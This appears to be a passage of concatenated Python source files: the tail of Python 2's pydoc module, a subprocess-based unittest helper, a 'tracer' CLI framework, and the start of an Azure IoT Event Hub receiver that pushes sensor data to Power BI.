if hasattr(loader,'get_filename'):
path = loader.get_filename(modname)
else:
path = None
else:
module = loader.load_module(modname)
desc = (module.__doc__ or '').splitlines()[0]
path = getattr(module,'__file__',None)
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(path, modname, desc)
if completer:
completer()
def apropos(key):
"""Print all the one-line module summaries that contain a substring."""
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
print modname, desc and '- ' + desc
def onerror(modname):
pass
with warnings.catch_warnings():
warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key, onerror=onerror)
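# Usage sketch: apropos('csv') prints one line per importable module whose
# name or one-line synopsis contains 'csv', using the callback defined above.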
# --------------------------------------------------- web browser interface
def serve(port, callback=None, completer=None):
import BaseHTTPServer, mimetools, select
# Patch up mimetools.Message so it doesn't break if rfc822 is reloaded.
class Message(mimetools.Message):
def __init__(self, fp, seekable=1):
Message = self.__class__
Message.__bases__[0].__bases__[0].__init__(self, fp, seekable)
self.encodingheader = self.getheader('content-transfer-encoding')
self.typeheader = self.getheader('content-type')
self.parsetype()
self.parseplist()
class DocHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def send_document(self, title, contents):
try:
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(html.page(title, contents))
except IOError: pass
def do_GET(self):
path = self.path
if path[-5:] == '.html': path = path[:-5]
if path[:1] == '/': path = path[1:]
if path and path != '.':
try:
obj = locate(path, forceload=1)
except ErrorDuringImport, value:
self.send_document(path, html.escape(str(value)))
return
if obj:
self.send_document(describe(obj), html.document(obj, path))
else:
self.send_document(path,
'no Python documentation found for %s' % repr(path))
else:
heading = html.heading(
'<big><big><strong>Python: Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
names = filter(lambda x: x != '__main__',
sys.builtin_module_names)
contents = html.multicolumn(names, bltinlink)
indices = ['<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
indices.append(html.index(dir, seen))
contents = heading + join(indices) + '''<p align=right>
<font color="#909090" face="helvetica, arial"><strong>
pydoc</strong> by Ka-Ping Yee &lt;ping@lfw.org&gt;</font>'''
self.send_document('Index of Modules', contents)
def log_message(self, *args): pass
class DocServer(BaseHTTPServer.HTTPServer):
def __init__(self, port, callback):
host = 'localhost'
self.address = (host, port)
self.url = 'http://%s:%d/' % (host, port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
def serve_until_quit(self):
import select
self.quit = False
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd: self.handle_request()
def server_activate(self):
self.base.server_activate(self)
if self.callback: self.callback(self)
DocServer.base = BaseHTTPServer.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = Message
try:
try:
DocServer(port, callback).serve_until_quit()
except (KeyboardInterrupt, select.error):
pass
finally:
if completer: completer()
# ----------------------------------------------------- graphical interface
def gui():
"""Graphical interface (starts web server and pops up a control window)."""
class GUI:
def __init__(self, window, port=7464):
self.window = window
self.server = None
self.scanner = None
import Tkinter
self.server_frm = Tkinter.Frame(window)
self.title_lbl = Tkinter.Label(self.server_frm,
text='Starting server...\n ')
self.open_btn = Tkinter.Button(self.server_frm,
text='open browser', command=self.open, state='disabled')
self.quit_btn = Tkinter.Button(self.server_frm,
text='quit serving', command=self.quit, state='disabled')
self.search_frm = Tkinter.Frame(window)
self.search_lbl = Tkinter.Label(self.search_frm, text='Search for')
self.search_ent = Tkinter.Entry(self.search_frm)
self.search_ent.bind('<Return>', self.search)
self.stop_btn = Tkinter.Button(self.search_frm,
text='stop', pady=0, command=self.stop, state='disabled')
if sys.platform == 'win32':
# Trying to hide and show this button crashes under Windows.
self.stop_btn.pack(side='right')
self.window.title('pydoc')
self.window.protocol('WM_DELETE_WINDOW', self.quit)
self.title_lbl.pack(side='top', fill='x')
self.open_btn.pack(side='left', fill='x', expand=1)
self.quit_btn.pack(side='right', fill='x', expand=1)
self.server_frm.pack(side='top', fill='x')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
self.search_frm.pack(side='top', fill='x')
self.search_ent.focus_set()
font = ('helvetica', sys.platform == 'win32' and 8 or 10)
self.result_lst = Tkinter.Listbox(window, font=font, height=6)
self.result_lst.bind('<Button-1>', self.select)
self.result_lst.bind('<Double-Button-1>', self.goto)
self.result_scr = Tkinter.Scrollbar(window,
orient='vertical', command=self.result_lst.yview)
self.result_lst.config(yscrollcommand=self.result_scr.set)
self.result_frm = Tkinter.Frame(window)
self.goto_btn = Tkinter.Button(self.result_frm,
text='go to selected', command=self.goto)
self.hide_btn = Tkinter.Button(self.result_frm,
text='hide results', command=self.hide)
self.goto_btn.pack(side='left', fill='x', expand=1)
self.hide_btn.pack(side='right', fill='x', expand=1)
self.window.update()
self.minwidth = self.window.winfo_width()
self.minheight = self.window.winfo_height()
self.bigminheight = (self.server_frm.winfo_reqheight() +
self.search_frm.winfo_reqheight() +
self.result_lst.winfo_reqheight() +
self.result_frm.winfo_reqheight())
self.bigwidth, self.bigheight = self.minwidth, self.bigminheight
self.expanded = 0
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.window.tk.willdispatch()
import threading
threading.Thread(
target=serve, args=(port, self.ready, self.quit)).start()
def ready(self, server):
self.server = server
self.title_lbl.config(
text='Python documentation server at\n' + server.url)
self.open_btn.config(state='normal')
self.quit_btn.config(state='normal')
def open(self, event=None, url=None):
url = url or self.server.url
try:
import webbrowser
webbrowser.open(url)
except ImportError: # pre-webbrowser.py compatibility
if sys.platform == 'win32':
os.system('start "%s"' % url)
else:
rc = os.system('netscape -remote "openURL(%s)" &' % url)
if rc: os.system('netscape "%s" &' % url)
def quit(self, event=None):
if self.server:
self.server.quit = 1
self.window.quit()
def search(self, event=None):
key = self.search_ent.get()
self.stop_btn.pack(side='right')
self.stop_btn.config(state='normal')
self.search_lbl.config(text='Searching for "%s"...' % key)
self.search_ent.forget()
self.search_lbl.pack(side='left')
self.result_lst.delete(0, 'end')
self.goto_btn.config(state='disabled')
self.expand()
import threading
if self.scanner:
self.scanner.quit = 1
self.scanner = ModuleScanner()
threading.Thread(target=self.scanner.run,
args=(self.update, key, self.done)).start()
def update(self, path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
self.result_lst.insert('end',
modname + ' - ' + (desc or '(no description)'))
def stop(self, event=None):
if self.scanner:
self.scanner.quit = 1
self.scanner = None
def done(self):
self.scanner = None
self.search_lbl.config(text='Search for')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
if sys.platform != 'win32': self.stop_btn.forget()
self.stop_btn.config(state='disabled')
def select(self, event=None):
self.goto_btn.config(state='normal')
def goto(self, event=None):
selection = self.result_lst.curselection()
if selection:
modname = split(self.result_lst.get(selection[0]))[0]
self.open(url=self.server.url + modname + '.html')
def collapse(self):
if not self.expanded: return
self.result_frm.forget()
self.result_scr.forget()
self.result_lst.forget()
self.bigwidth = self.window.winfo_width()
self.bigheight = self.window.winfo_height()
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.expanded = 0
def expand(self):
if self.expanded: return
self.result_frm.pack(side='bottom', fill='x')
self.result_scr.pack(side='right', fill='y')
self.result_lst.pack(side='top', fill='both', expand=1)
self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight))
self.window.wm_minsize(self.minwidth, self.bigminheight)
self.expanded = 1
def hide(self, event=None):
self.stop()
self.collapse()
import Tkinter
try:
root = Tkinter.Tk()
# Tk will crash if pythonw.exe has an XP .manifest
# file and the root is not destroyed explicitly.
# If the problem is ever fixed in Tk, the explicit
# destroy can go.
try:
gui = GUI(root)
root.mainloop()
finally:
root.destroy()
except KeyboardInterrupt:
pass
# -------------------------------------------------- command-line interface
def ispath(x):
return isinstance(x, str) and find(x, os.sep) >= 0
def cli():
"""Command-line interface (looks at sys.argv to decide what to do)."""
import getopt
class BadUsage: pass
# Scripts don't get the current directory in their path by default
# unless they are run with the '-m' switch
if '' not in sys.path:
scriptdir = os.path.dirname(sys.argv[0])
if scriptdir in sys.path:
sys.path.remove(scriptdir)
sys.path.insert(0, '.')
try:
opts, args = getopt.getopt(sys.argv[1:], 'gk:p:w')
writing = 0
for opt, val in opts:
if opt == '-g':
gui()
return
if opt == '-k':
apropos(val)
return
if opt == '-p':
try:
port = int(val)
except ValueError:
raise BadUsage
def ready(server):
print 'pydoc server ready at %s' % server.url
def stopped():
print 'pydoc server stopped'
serve(port, ready, stopped)
return
if opt == '-w':
writing = 1
if not args: raise BadUsage
for arg in args:
if ispath(arg) and not os.path.exists(arg):
print 'file %r does not exist' % arg
break
try:
if ispath(arg) and os.path.isfile(arg):
arg = importfile(arg)
if writing:
if ispath(arg) and os.path.isdir(arg):
writedocs(arg)
else:
writedoc(arg)
else:
help.help(arg)
except ErrorDuringImport, value:
print value
except (getopt.error, BadUsage):
cmd = os.path.basename(sys.argv[0])
print """pydoc - the Python documentation tool
%s <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '%s', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
%s -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
%s -p <port>
Start an HTTP server on the given port on the local machine.
%s -g
Pop up a graphical interface for finding and serving documentation.
%s -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '%s', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
""" % (cmd, os.sep, cmd, cmd, cmd, cmd, os.sep)
if __name__ == '__main__': cli()
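# Programmatic usage sketch (illustrative): besides the command line, the
# helpers defined above can be driven directly from Python, e.g.
#   import pydoc
#   pydoc.writedoc('json')            # writes json.html in the current directory
#   text = pydoc.render_doc('json')   # plain-text help as a string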
|
exampletest.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License
#
# A test library to make it easy to run unittest tests that start,
# monitor, and report output from sub-processes. In particular
# it helps with starting processes that listen on random ports.
import unittest
import os, sys, socket, time, re, inspect, errno, threading
from random import randrange
from subprocess import Popen, PIPE, STDOUT
from copy import copy
import platform
from os.path import dirname as dirname
def pick_port():
"""Pick a random port."""
p = randrange(10000, 20000)
return p
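# Note: pick_port() only draws a random number in [10000, 20000); nothing
# reserves the port, so callers pair it with wait_port() below to confirm the
# process under test actually started listening there.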
class ProcError(Exception):
"""An exception that captures failed process output"""
def __init__(self, proc, what="bad exit status"):
out = proc.out.strip()
if out:
out = "\nvvvvvvvvvvvvvvvv\n%s\n^^^^^^^^^^^^^^^^\n" % out
else:
out = ", no output)"
super(ProcError, self).__init__(
"%s %s, code=%s%s" % (proc.args, what, proc.returncode, out))
class NotFoundError(ProcError):
pass
class Proc(Popen):
"""A example process that stores its output, optionally run with valgrind."""
if "VALGRIND" in os.environ and os.environ["VALGRIND"]:
env_args = [os.environ["VALGRIND"], "--error-exitcode=42", "--quiet", "--leak-check=full"]
else:
env_args = []
@property
def out(self):
self._out.seek(0)
return self._out.read()
def __init__(self, args, **kwargs):
"""Start an example process"""
args = list(args)
self.args = args
self._out = os.tmpfile()
try:
Popen.__init__(self, self.env_args + self.args, stdout=self._out, stderr=STDOUT, **kwargs)
except OSError, e:
if e.errno == errno.ENOENT:
raise NotFoundError(self, str(e))
raise ProcError(self, str(e))
except Exception, e:
raise ProcError(self, str(e))
def kill(self):
try:
if self.poll() is None:
Popen.kill(self)
except:
pass # Already exited.
return self.out
def wait_out(self, timeout=10, expect=0):
"""Wait for process to exit, return output. Raise ProcError on failure."""
t = threading.Thread(target=self.wait)
t.start()
t.join(timeout)
if self.poll() is None: # Still running
self.kill()
raise ProcError(self, "timeout")
if expect is not None and self.poll() != expect:
raise ProcError(self)
return self.out
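# Usage sketch: run a short-lived child and collect its combined output.
#   p = Proc(["python", "-c", "print 'hi'"])
#   out = p.wait_out(timeout=5)   # raises ProcError on timeout or non-zero exit
#   assert out.strip() == "hi"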
# Work-around older python unittest that lacks setUpClass.
if hasattr(unittest.TestCase, 'setUpClass') and hasattr(unittest.TestCase, 'tearDownClass'):
TestCase = unittest.TestCase
else:
class TestCase(unittest.TestCase):
"""
Roughly provides setUpClass and tearDownClass functionality for older python
versions in our test scenarios. If subclasses override setUp or tearDown
they *must* call the superclass.
"""
def setUp(self):
if not hasattr(type(self), '_setup_class_count'):
type(self)._setup_class_count = len(
inspect.getmembers(
type(self),
predicate=lambda(m): inspect.ismethod(m) and m.__name__.startswith('test_')))
type(self).setUpClass()
def tearDown(self):
self.assertTrue(self._setup_class_count > 0)
self._setup_class_count -= 1
if self._setup_class_count == 0:
type(self).tearDownClass()
class ExampleTestCase(TestCase):
"""TestCase that manages started processes"""
def setUp(self):
super(ExampleTestCase, self).setUp()
self.procs = []
def tearDown(self):
for p in self.procs:
p.kill()
super(ExampleTestCase, self).tearDown()
def proc(self, *args, **kwargs):
p = Proc(*args, **kwargs)
self.procs.append(p)
return p
def wait_port(port, timeout=10):
"""Wait up to timeout for port to be connectable."""
if timeout:
deadline = time.time() + timeout
while (timeout is None or time.time() < deadline):
try:
s = socket.create_connection((None, port), timeout) # Works for IPv6 and v4
s.close()
return
except socket.error, e:
if e.errno != errno.ECONNREFUSED: # Only retry on connection refused error.
raise
raise socket.timeout()
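# Usage sketch (the server name and flag below are hypothetical): start a
# listener on a random port and block until it is connectable.
#   port = pick_port()
#   server = Proc(["some_server", "--port", str(port)])
#   wait_port(port, timeout=10)   # raises socket.timeout if it never comes up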
class BrokerTestCase(ExampleTestCase):
"""
ExampleTestCase that starts a broker in setUpClass and kills it in tearDownClass.
Subclass must set `broker_exe` class variable with the name of the broker executable.
"""
@classmethod
def setUpClass(cls):
cls.port = pick_port()
cls.addr = "127.0.0.1:%s/examples" % (cls.port)
cls.broker = None # In case Proc throws, create the attribute.
cls.broker = Proc(cls.broker_exe + ["-a", cls.addr])
try:
wait_port(cls.port)
except Exception, e:
cls.broker.kill()
raise ProcError(cls.broker, "timed out waiting for port")
@classmethod
def tearDownClass(cls):
if cls.broker: cls.broker.kill()
def tearDown(self):
b = type(self).broker
if b and b.poll() != None: # Broker crashed
type(self).setUpClass() # Start another for the next test.
raise ProcError(b, "broker crash")
super(BrokerTestCase, self).tearDown()
if __name__ == "__main__":
unittest.main()
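# Subclassing sketch (names are illustrative): a concrete test module sets
# broker_exe and then talks to the per-class broker address, e.g.
#   class MyBrokerTest(BrokerTestCase):
#       broker_exe = ["./broker"]
#       def test_send(self):
#           self.proc(["./send", self.addr]).wait_out()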
|
cli.py
|
#===============================================================================
# Imports
#===============================================================================
from __future__ import print_function
import os
import re
import sys
import optparse
import textwrap
import importlib
from collections import (
OrderedDict,
)
from textwrap import (
dedent,
)
import tracer
from .config import (
Config,
ConfigObjectAlreadyCreated,
get_config,
_clear_config_if_already_created,
)
from .command import (
Command,
CommandError,
ClashingCommandNames,
)
from .util import (
iterable,
ensure_unique,
add_linesep_if_missing,
prepend_error_if_missing,
Dict,
Options,
Constant,
DecayDict,
)
from .invariant import (
Invariant,
)
#===============================================================================
# Globals
#===============================================================================
INTERACTIVE = False
#===============================================================================
# Constants
#===============================================================================
class _ArgumentType(Constant):
Optional = 1
Mandatory = 2
ArgumentType = _ArgumentType()
#===============================================================================
# CommandLine Class
#===============================================================================
class CommandLine:
_conf_ = True
_argc_ = 0
_optc_ = 0
_vargc_ = None
_usage_ = None
_quiet_ = None
_verbose_ = None
_command_ = None
_shortname_ = None
_description_ = None
def __init__(self, program_name, command_class, config_class):
self.mandatory_opts = OrderedDict()
self.config_class = config_class
self.program_name = program_name
self.command_class = command_class
self.command_classname = command_class.__name__
self.command = self.command_class(sys.stdin, sys.stdout, sys.stderr)
self.name = self.command.name
self.shortname = self.command.shortname
self.prog = '%s %s' % (self.program_name, self.name)
self.parser = None
self.conf = None
def add_option(self, *args, **kwds):
if kwds.get('mandatory'):
self.mandatory_opts[args] = kwds['dest']
del kwds['mandatory']
self.parser.add_option(*args, **kwds)
def remove_option(self, *args):
self.parser.remove_option(args[0])
if args in self.mandatory_opts:
del self.mandatory_opts[args]
def usage_error(self, msg):
self.parser.print_help()
sys.stderr.write("\nerror: %s\n" % msg)
self.parser.exit(status=1)
def _add_parser_options(self):
cmd = self.command
if not hasattr(cmd, '_invariants'):
return
invariants = cmd._invariants
for (_, name) in cmd._invariant_order:
i = invariants[name]
args = []
if i._opt_short:
args.append('-' + i._opt_short)
if i._opt_long:
args.append('--' + i._opt_long)
fields = (
'help',
'action',
'default',
'metavar',
'mandatory',
)
k = Dict()
k.dest = name
for f in fields:
v = getattr(i, '_' + f)
if v:
k[f] = v if not callable(v) else v()
self.add_option(*args, **k)
def run(self, args):
k = Dict()
k.prog = self.prog
if self._usage_:
k.usage = self._usage_
if self._description_:
k.description = self._description_
else:
docstring = self.command.__doc__
if docstring:
k.description = textwrap.dedent(docstring)
self.parser = optparse.OptionParser(**k)
if self.command._verbose_:
assert self.command._quiet_ is None
self.parser.add_option(
'-v', '--verbose',
dest='verbose',
action='store_true',
default=False,
help="run in verbose mode [default: %default]"
)
if self.command._quiet_:
assert self.command._verbose_ is None
self.parser.add_option(
'-q', '--quiet',
dest='quiet',
action='store_true',
default=False,
help="run in quiet mode [default: %default]"
)
if self.command._conf_:
self.parser.add_option(
'-c', '--conf',
metavar='FILE',
help="use alternate configuration file FILE"
)
self._add_parser_options()
(opts, self.args) = self.parser.parse_args(args)
# Ignore variable argument commands altogether.
# xxx: todo
if 0 and self._vargc_ is not True:
arglen = len(self.args)
if arglen == 0 and self._argc_ != 0:
self.parser.print_help()
self.parser.exit(status=1)
if len(self.args) != self._argc_ and self._argc_ != 0:
self.usage_error("invalid number of arguments")
self.options = Options(opts.__dict__)
if self.mandatory_opts:
d = opts.__dict__
for (opt, name) in self.mandatory_opts.items():
if d.get(name) is None:
self.usage_error("%s is mandatory" % '/'.join(opt))
#self._pre_process_parser_results()
f = None
if self._conf_:
f = self.options.conf
if f and not os.path.exists(f):
self.usage_error("configuration file '%s' does not exist" % f)
try:
self.conf = self.config_class(options=self.options)
self.conf.load(filename=f)
except ConfigObjectAlreadyCreated:
self.conf = get_config()
self.command.interactive = INTERACTIVE
self.command.conf = self.conf
self.command.args = self.args
self.command.options = self.options
self.command.start()
#===============================================================================
# CLI Class
#===============================================================================
class CLI(object):
"""
The CLI class glues together Command and CommandLine instances.
"""
__unknown_subcommand__ = "Unknown subcommand '%s'"
__usage__ = "Type '%prog help' for usage."
__help__ = """\
Type '%prog <subcommand> help' for help on a specific subcommand.
Available subcommands:"""
def __init__(self, *args, **kwds):
k = DecayDict(**kwds)
self.args = list(args) if args else []
self.program_name = k.program_name
self.module_names = k.module_names or []
self.args_queue = k.get('args_queue', None)
self.feedback_queue = k.get('feedback_queue', None)
k.assert_empty(self)
self.returncode = 0
self.commandline = None
ensure_unique(self.module_names)
self.modules = Dict()
self.modules.config = OrderedDict()
self.modules.commands = OrderedDict()
self._help = self.__help__
self._commands_by_name = dict()
self._commands_by_shortname = dict()
self._import_command_and_config_modules()
self._load_commands()
if not self.args_queue:
if self.args:
self.run()
else:
self.help()
def run(self):
if not self.args_queue:
self._process_commandline()
return
from Queue import Empty
cmdlines = {}
while True:
try:
args = self.args_queue.get_nowait()
except Empty:
break
cmdline = args.pop(0).lower()
if cmdline not in cmdlines:
cmdlines[cmdline] = self._find_commandline(cmdline)
cl = cmdlines[cmdline]
cl.run(args)
self.args_queue.task_done()
def _import_command_and_config_modules(self):
for namespace in self.module_names:
for suffix in ('commands', 'config'):
name = '.'.join((namespace, suffix))
store = getattr(self.modules, suffix)
store[namespace] = importlib.import_module(name)
def _find_command_subclasses(self):
seen = dict()
pattern = re.compile('^class ([^\s]+)\(.*', re.M)
subclasses = list()
for (namespace, module) in self.modules.commands.items():
path = module.__file__
if path[-1] == 'c':
path = path[:-1]
with open(path, 'r') as f:
matches = pattern.findall(f.read())
for name in [ n for n in matches if n[0] != '_' ]:
attr = getattr(module, name)
if attr == Command or not issubclass(attr, Command):
continue
if name in seen:
args = (name, seen[name], namespace)
raise ClashingCommandNames(*args)
seen[name] = namespace
subclasses.append((namespace, name, attr))
return subclasses
def _load_commands(self):
subclasses = [
sc for sc in sorted(self._find_command_subclasses())
]
for (namespace, command_name, command_class) in subclasses:
if command_name in self._commands_by_name:
continue
config_module = self.modules.config[namespace]
config_class = getattr(config_module, 'Config')
cl = CommandLine(self.program_name, command_class, config_class)
helpstr = self._helpstr(cl.name)
if cl.shortname:
if cl.shortname in self._commands_by_shortname:
continue
self._commands_by_shortname[cl.shortname] = cl
if '[n]@' in helpstr:
prefix = '[n]@'
else:
prefix = ''
helpstr += ' (%s%s)' % (prefix, cl.shortname)
self._help += helpstr
self._commands_by_name[cl.name] = cl
# Add a fake version command so that it'll appear in the list of
# available commands. (We intercept version requests during
# _process_command(); there's no actual command for it.)
self._help += self._helpstr('version')
self._commands_by_name['version'] = None
def _helpstr(self, name):
i = 12
if name.startswith('multiprocess'):
prefix = '[n]@'
name = prefix + name
i -= len(prefix)
return os.linesep + (' ' * i) + name
def _load_commandlines(self):
subclasses = [
sc for sc in sorted(self._find_commandline_subclasses())
]
for (scname, subclass) in subclasses:
if scname in self._commands_by_name:
continue
try:
cl = subclass(self.program_name)
except TypeError as e:
# Skip abstract base classes (e.g. 'AdminCommandLine').
if e.args[0].startswith("Can't instantiate abstract class"):
continue
raise
helpstr = self._helpstr(cl.name)
if cl.shortname:
if cl.shortname in self._commands_by_shortname:
continue
self._commands_by_shortname[cl.shortname] = cl
helpstr += ' (%s)' % cl.shortname
self._help += helpstr
self._commands_by_name[cl.name] = cl
# Add a fake version command so that it'll appear in the list of
# available subcommands. It doesn't matter if it's None as we
# intercept 'version', '-v' and '--version' in the
# _process_commandline method before doing the normal command
# lookup.
self._help += self._helpstr('version')
self._commands_by_name['version'] = None
def _find_commandline(self, cmdline):
return self._commands_by_name.get(cmdline,
self._commands_by_shortname.get(cmdline))
def _process_commandline(self):
args = self.args
cmdline = args.pop(0).lower()
if cmdline and cmdline[0] != '_':
if '-' not in cmdline and hasattr(self, cmdline):
getattr(self, cmdline)(args)
return self._exit(0)
elif cmdline in ('-v', '-V', '--version'):
self.version()
else:
cl = self.commandline = self._find_commandline(cmdline)
if cl:
try:
cl.run(args)
return self._exit(0)
except (CommandError, Invariant) as err:
self._commandline_error(cl, str(err))
if not self.returncode:
self._error(
os.linesep.join((
self.__unknown_subcommand__ % cmdline,
self.__usage__,
))
)
def _exit(self, code):
self.returncode = code
def _commandline_error(self, cl, msg):
args = (self.program_name, cl.name, msg)
msg = '%s %s failed: %s' % args
sys.stderr.write(prepend_error_if_missing(msg))
return self._exit(1)
def _error(self, msg):
sys.stderr.write(
add_linesep_if_missing(
dedent(msg).replace(
'%prog', self.program_name
)
)
)
return self._exit(1)
def usage(self, args=None):
self._error(self.__usage__)
def version(self, args=None):
sys.stdout.write(add_linesep_if_missing(tracer.__version__))
return self._exit(0)
def help(self, args=None):
if args:
l = [ args.pop(0), '-h' ]
if args:
l += args
self.args = l
self._process_commandline()
else:
self._error(self._help + os.linesep)
#===============================================================================
# Main
#===============================================================================
def extract_command_args_and_kwds(*args_):
args = [ a for a in args_ ]
kwds = {
'program_name': args.pop(0),
'module_names': [ m for m in args.pop(0).split(',') ] if args else None
}
return (args, kwds)
def run(*args_):
global INTERACTIVE
if len(args_) == 1 and isinstance(args_[0], str):
args_ = args_[0].split(' ')
INTERACTIVE = True
(args, kwds) = extract_command_args_and_kwds(*args_)
_clear_config_if_already_created()
cli = CLI(*args, **kwds)
if INTERACTIVE:
return cli.commandline.command
else:
return cli
def run_mp(**kwds):
cli = CLI(**kwds)
cli.run()
if __name__ == '__main__':
# Intended invocation:
# python -m tracer.cli <program_name> <library_name> \
# <command_name> [arg1 arg2 argN]
# Multiprocessor support: prefix command_name with @. The @ will be
# removed, the command will be run, and then the command.result field
# will be expected to be populated with a list of argument lists that
# will be pushed onto a multiprocessing joinable queue.
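# For example (all names below are hypothetical), an invocation such as
#   python -m tracer.cli mytool mytool 4@scan extra-arg
# runs the 'scan' command once, reads command.results, and then fans those
# argument lists out to 4 worker processes through the joinable queue below.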
is_mp = False
args = sys.argv[1:]
if len(args) <= 2:
cli = run(*args)
sys.exit(cli.returncode)
command = args[2]
if '@' in command:
is_mp = True
ix = command.find('@')
parallelism_hint = int(command[:ix] or 0)
args[2] = command[ix+1:]
cli = run(*args)
if not is_mp or cli.returncode:
sys.exit(cli.returncode)
command = cli.commandline.command
results = command.results
if not results:
err("parallel command did not produce any results\n")
sys.exit(1)
from multiprocessing import (
cpu_count,
Process,
JoinableQueue,
)
args_queue = JoinableQueue(len(results))
for args in results:
args_queue.put(args[2:])
# Grab the program_name and module_names from the first result args.
(_, kwds) = extract_command_args_and_kwds(*results[0])
kwds['args_queue'] = args_queue
nprocs = cpu_count()
if parallelism_hint:
if parallelism_hint > nprocs:
fmt = "warning: parallelism hint exceeds ncpus (%d vs %d)\n"
msg = fmt % (parallelism_hint, nprocs)
sys.stderr.write(msg)
nprocs = parallelism_hint
procs = []
for i in range(0, nprocs):
p = Process(target=run_mp, kwargs=kwds)
procs.append(p)
p.start()
sys.stdout.write("started %d processes\n" % len(procs))
args_queue.join()
def main(program_name=None, library_name=None):
if not program_name:
program_name = 'tracer'
if not library_name:
library_name = 'tracer'
args = [ program_name, library_name ] + sys.argv[1:]
cli = run(*args)
sys.exit(cli.returncode)
# vim:set ts=8 sw=4 sts=4 tw=78 et:
|
run.py
|
# -*- coding: utf-8 -*-
from azure.storage.blob import BlockBlobService
import UtilityHelper
import asyncio
import requests, datetime
import os, json, threading, time
import multiprocessing
from azure.eventprocessorhost import (
AbstractEventProcessor,
AzureStorageCheckpointLeaseManager,
EventHubConfig,
EventProcessorHost,
EPHOptions)
_httpRequest = requests.session()
_headers = {
'Content-Type': 'application/json',
}
def Send2PowerBI(jsonData):
_httpRequest.post(jsonData['pushURL'], headers=_headers, params=None, json=jsonData)
print('send:' + str(jsonData))
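# Illustrative shape of the jsonData payload handed to Send2PowerBI (assumed
# from the fields assembled later in this file; the URL and values here are
# placeholders):
#   {'pushURL': 'https://api.powerbi.com/...', 'SourceTimestamp': '...',
#    'TEMP': 25.3, 'IRR': 42.0, 'INV': 3.1}
# Send2PowerBI posts that dict as the JSON body to jsonData['pushURL'].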
class PowerBIHelper:
_dataQueue = []
def __init__(self):
self.httpRequest = requests.session()
def feedIn(self, jsonData):
try:
PowerBIHelper._dataQueue.append(jsonData)
except Exception as ex:
print(str(ex))
def start(self):
print('PowerBIHelper instance started')
threading.Thread(target=self.emit, daemon=True, args=()).start()
def emit(self):
while True:
if (len(PowerBIHelper._dataQueue) > 0):
postData = PowerBIHelper._dataQueue.pop(0)
p = multiprocessing.Process(target=Send2PowerBI, args=(postData,))
p.start()
print('PowerBI queue length:' + str(len(PowerBIHelper._dataQueue)))
class EventProcessor(AbstractEventProcessor):
def __init__(self, params=None):
super().__init__(params)
# Initialize Event Processor Host
async def open_async(self, context):
print("Connection established {}".format(context.partition_id))
# The Processor Host indicates that the event processor is being stopped.
async def close_async(self, context, reason):
print("Connection closed (reason {}, id {}, offset {}, sq_number {})".format(
reason,
context.partition_id,
context.offset,
context.sequence_number))
# Processor Host received a batch of events.
# We retrieve the Tenant Id from the application properties
# and feed the message to the SignalR Web API
async def process_events_async(self, context, messages):
for eventData in messages:
deviceId = eventData._annotations[b'iothub-connection-device-id'].decode("utf-8")
try:
pushURL = _deviceMap[deviceId]
messageJSON = json.loads(str(eventData.message))
_pushData[deviceId]['pushURL'] = pushURL
_pushData[deviceId]['SourceTimestamp'] = messageJSON['timestamp']
for tag in messageJSON['tags']:
if tag['Name'] == 'TEMP':
#pushData['TEMP'] = tag['Value'] * 1.8 + 32
_pushData[deviceId]['TEMP'] = tag['Value']
elif tag['Name'] == 'IRR':
_pushData[deviceId]['IRR'] = tag['Value']
elif tag['Name'] == 'INV':
_pushData[deviceId]['INV'] = tag['Value']
powerBI.feedIn(_pushData[deviceId])
except:
print('Exception on handle deviceId: ' + deviceId)
await context.checkpoint_async()
# The Processor Host indicates an error happened; it will keep trying to pump messages. No action is required.
async def process_error_async(self, context, error):
print("Event Processor Error {!r}".format(error))
# Endless Loop
async def noneStop(host):
while True:
await asyncio.sleep(600)
class HotdataReceiverMain:
def __init__(self):
# Load Configuration from file
try:
configFile = os.path.join(os.path.dirname((os.path.dirname(os.path.abspath(__file__)))), 'config.json')
with open(configFile) as json_file:
config = json.load(json_file)
nameValue = UtilityHelper.connectStringToDictionary(config['azureResource']['StorageAccountConnectionString'])
self.storageAccountName = nameValue['AccountName']
self.storageAccountKey = nameValue['AccountKey']
self.storageEndpointSuffix = nameValue['EndpointSuffix']
self.storageContainer = config['azureResource']['StorageContainerPowerBI']
self.eventHubConnectionString = config['azureResource']['IoT-EventHubConnectionString']
self.eventHubName = config['azureResource']['IoT-EventHubName']
